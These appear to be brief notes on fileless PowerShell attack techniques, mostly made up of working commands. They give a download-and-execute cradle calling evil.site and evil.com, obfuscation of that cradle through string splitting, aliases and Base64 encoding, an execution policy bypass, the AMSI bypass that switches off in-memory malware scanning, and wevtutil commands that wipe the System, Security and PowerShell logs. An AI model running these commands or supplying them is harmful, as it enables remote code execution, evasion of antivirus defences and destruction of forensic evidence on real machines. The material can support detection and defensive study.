1. Fileless?
- Fileless attacks are malicious scripts or commands that never touch disk
- They only exist in memory, making them harder to detect with antivirus or endpoint detection systems.
- PowerShell is perfect for fileless execution.
2. Download & Execute Code From the Internet
IEX (New-Object Net.WebClient).DownloadString('http://evil.site/payload.ps1')
3. Obfuscation Techniques (Avoiding Detection)
1) Base64 Encoding (used with -EncodedCommand)
powershell.exe -EncodedCommand aQBlAHgAIAAoAC...2) String Splitting / Concatenation
$part1 = "IEX"
$part2 = " (New-Object Net.WebClient).DownloadString('http://evil.com/s.ps1')"
Invoke-Expression ($part1 + $part2)3) Aliases and Reversing
- Instead of writing Invoke-Expression, attacker use:
I`eXor
&([string]::Join('',('Invo','ke-Exp','ression')))- The goal is to bypass signature-based detection
4. Bypass Defender (ExecutionPolicy + AMSI)
1) Execution Policy Bypass (simple)
powershell -ExecutionPolicy Bypass -File evil.ps12) AMSI Bypass (advanced)
- AMSI = Anti-Malware Scan Interface. It scans PowerShell scripts in memory.
- Attackers use this to turn it off during script execution.
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')\
.GetField('amsiInitFailed','NonPublic,Static')\
.SetValue($null,$true)
5. Anti-Forensics: Clear Logs after Attack
wevtutil cl System
wevtutil cl Security
wevtutil cl "Windows PowerShell"